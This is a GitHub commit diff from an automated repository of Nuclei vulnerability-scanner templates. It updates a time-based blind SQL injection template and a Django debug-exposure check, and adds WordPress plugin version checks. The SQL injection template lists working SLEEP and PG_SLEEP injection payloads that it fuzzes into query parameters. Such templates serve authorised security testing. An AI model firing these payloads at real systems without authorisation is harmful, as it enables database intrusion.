Skip to content

Commit

Permalink
20240824
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Aug 24, 2024
1 parent 942d4ab commit eb5f600
Show file tree
Hide file tree
Showing 144 changed files with 7,605 additions and 424 deletions.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20240823
20240824
120 changes: 120 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

66 changes: 33 additions & 33 deletions poc/auth/BlindSQLAuth.yaml
Original file line number Diff line number Diff line change
@@ -1,33 +1,33 @@
id: time-based-sqli
info:
name: Time-Based Blind SQL Injection
author: Coffinxp/lostsec
severity: Critical
description: Detects time-based blind SQL injection vulnerability
http:
- method: GET
path:
- "{{BaseURL}}"
payloads:
injection:
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- "'%2b(select*from(select(sleep(7)))a)%2b'"
- "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z"
- "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X"
- "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X"
- "if(now()=sysdate(),SLEEP(7),0)"
- "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{injection}}"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "duration>=7 && duration <=16"
id: time-based-sqli
info:
name: Time-Based Blind SQL Injection
author: KhukuriRimal
severity: Critical
description: Detects time-based blind SQL injection vulnerability
http:
- method: GET
path:
- "{{BaseURL}}"
payloads:
injection:
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- "if(now()=sysdate(),SLEEP(7),0)"
- "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
- "XOR(if(now()=sysdate(),sleep(7),0))XOR"
- "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337"
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{injection}}"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "duration>=7 && duration <=16"
condition: and
59 changes: 59 additions & 0 deletions poc/auth/login-as-users.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: login-as-users

info:
name: >
Login As Users <= 1.4.2 - Authentication Bypass
author: topscoder
severity: critical
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/73a0d7a9-374b-430d-a7e5-3c7cdaff5785?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/login-as-users/"
google-query: inurl:"/wp-content/plugins/login-as-users/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,login-as-users,critical

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/login-as-users/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "login-as-users"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.4.2')
18 changes: 9 additions & 9 deletions poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml
Original file line number Diff line number Diff line change
@@ -1,25 +1,25 @@
id: django-debug-exposure

info:
name: Django Debug Exposure
author: shelled
severity: medium
author: geeknik
severity: high
reference:
- https://twitter.com/Alra3ees/status/1397660633928286208
tags: django,exposure

requests:
- method: POST
path:
- "{{BaseURL}}/admin/login/?next=/admin/"

matchers-condition: and
matchers:
- type: status
status:
- 403

- 500
- type: word
part: body
words:
- 'seeing the help section of this page because you have <code>DEBUG ='
- 'True</code>'
- "DB_HOST"
- "DB_NAME"
- "DJANGO"
- "ADMIN_PASSWORD"
condition: and
59 changes: 59 additions & 0 deletions poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc

info:
name: >
Custom Permalinks <= 2.6.0 - Authenticated(Editor+) Stored Cross-Site Scripting
author: topscoder
severity: low
description: >
The Custom Permalinks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.0 due to insufficient input sanitization and output escaping on tag names. This allows authenticated users, with editor-level permissions or greater to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, even when 'unfiltered_html' has been disabled.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
cvss-score: 4.4
cve-id: CVE-2023-0926
metadata:
fofa-query: "wp-content/plugins/custom-permalinks/"
google-query: inurl:"/wp-content/plugins/custom-permalinks/"
shodan-query: 'vuln:CVE-2023-0926'
tags: cve,wordpress,wp-plugin,custom-permalinks,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/custom-permalinks/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "custom-permalinks"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.6.0')
59 changes: 59 additions & 0 deletions poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6

info:
name: >
String Locator <= 2.6.5 - Reflected Cross-Site Scripting
author: topscoder
severity: medium
description: >
The String locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sql-column' parameter in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This required WP_DEBUG to be enabled in order to be exploited.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/18e0140e-ac24-48c6-aea0-bb0da203a817?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-6987
metadata:
fofa-query: "wp-content/plugins/string-locator/"
google-query: inurl:"/wp-content/plugins/string-locator/"
shodan-query: 'vuln:CVE-2023-6987'
tags: cve,wordpress,wp-plugin,string-locator,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/string-locator/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "string-locator"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.6.5')
59 changes: 59 additions & 0 deletions poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2024-2254-fff7de08f6116735e0400b319113ddc3

info:
name: >
RT Easy Builder – Advanced addons for Elementor <= 2.2 - Authenticated (Contributor+) Stored Cross-site Scripting
author: topscoder
severity: low
description: >
The RT Easy Builder – Advanced addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/a5fb289e-bd38-42ea-86a4-7816b59bd0b2?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
cvss-score: 6.4
cve-id: CVE-2024-2254
metadata:
fofa-query: "wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/"
google-query: inurl:"/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/"
shodan-query: 'vuln:CVE-2024-2254'
tags: cve,wordpress,wp-plugin,rt-easy-builder-advanced-addons-for-elementor,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "rt-easy-builder-advanced-addons-for-elementor"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.2')
Loading

0 comments on commit eb5f600

Please sign in to comment.